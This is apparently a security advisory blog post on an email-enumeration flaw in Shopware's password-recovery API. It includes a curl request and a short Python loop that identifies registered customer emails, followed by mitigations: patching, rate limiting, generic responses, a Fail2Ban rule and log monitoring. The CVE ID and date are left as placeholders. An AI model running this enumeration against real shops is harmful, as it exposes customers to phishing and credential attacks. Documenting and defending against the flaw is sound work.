Shopware, Information Disclosure, CVE-2024-XXXX (Medium)

By /

How the CVE Works:

The vulnerability exists in Shopware’s `store-api` endpoint /store-api/account/recovery-password, which handles password recovery requests. When an attacker submits an email address, the API responds differently based on whether the email is registered:
– If the email does not exist, the API returns a 404 error with a clear message:

{"errors":[{"status":"404","code":"CHECKOUT__CUSTOMER_NOT_FOUND","detail":"No matching customer for the email '[email protected]' was found."}]}

– If the email exists, the API responds with a success message, confirming account presence.
This discrepancy allows attackers to enumerate valid user emails, facilitating phishing or brute-force attacks.

DailyCVE Form:

Platform: Shopware
Version: <6.6.10.3, <6.5.8.17
Vulnerability: Email Enumeration
Severity: Medium
Date: 2024-XX-XX

What Undercode Say:

Exploitation:

1. Manual Testing:

curl -X POST https://target.com/store-api/account/recovery-password -H 'Content-Type: application/json' -d '{"email":"[email protected]"}'

– Check for `404` (invalid) vs. `200` (valid).

2. Automated Enumeration:

import requests
emails = ["[email protected]", "[email protected]"]
for email in emails:
r = requests.post("https://target.com/store-api/account/recovery-password", json={"email": email})
if "CHECKOUT__CUSTOMER_NOT_FOUND" not in r.text:
print(f"Valid email: {email}")

Mitigation:

1. Patch: Upgrade to Shopware 6.6.10.3 or 6.5.8.17.

2. Rate Limiting: Restrict API requests per IP:

location /store-api/account/recovery-password {
limit_req zone=api_limit burst=5;
}

3. Obfuscate Responses: Return generic messages (e.g., “If the email exists, a recovery link was sent”).

4. WAF Rules: Block repeated enumeration attempts:

Fail2Ban rule for HTTP 404 abuse
[shopware-enum]
enabled = true
filter = shopware-enum-attempts
action = iptables-multiport[name=ShopwareEnum, port="80,443", protocol=tcp]

5. Log Monitoring: Alert on abnormal `/recovery-password` activity:

grep -P 'POST /store-api/account/recovery-password.404' /var/log/nginx/access.log | wc -l

Note: Replace `CVE-2024-XXXX` with the actual CVE ID once assigned.

References:

Reported By: https://github.com/advisories/GHSA-hh7j-6x3q-f52h
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top